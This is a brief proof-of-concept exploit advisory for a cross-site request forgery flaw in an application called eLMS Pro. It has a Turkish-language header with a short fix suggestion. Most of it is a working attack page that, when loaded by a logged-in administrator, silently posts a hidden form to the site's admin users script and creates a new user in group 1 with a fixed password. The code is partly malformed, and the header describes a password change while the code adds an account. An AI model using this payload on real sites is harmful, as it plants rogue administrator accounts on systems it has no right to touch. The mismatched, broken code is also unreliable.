< ------------------- header data start ------------------- >

#############################################################

# Application Name : eLMS Pro

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/n0x

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.n0x.submit();}</script>

<FORM action=http://www.Site.com/PATCH/admin/users.php method=POST name=n0x >
<INPUT type=hidden name=save value=1>
<INPUT type=hidden name=action value=add_new_user>

<INPUT type=hidden name=firstname maxlength=100 value=add>
<INPUT type=hidden name=lastname maxlength=100 value=add>
<INPUT type=hidden name=email maxlength=150 value=[email protected]>

<INPUT type=hidden name=login maxlength=50 value=addadd>
<INPUT type=hidden name=password maxlength=20 value=addadd>
<INPUT type=hidden name=re_password maxlength=20 value=addadd>
<select name=group_id style=width: 155px;><OPTION value=1 ></OPTION>

<input type=submit value=create name=B1>

< -- bug code end of -- >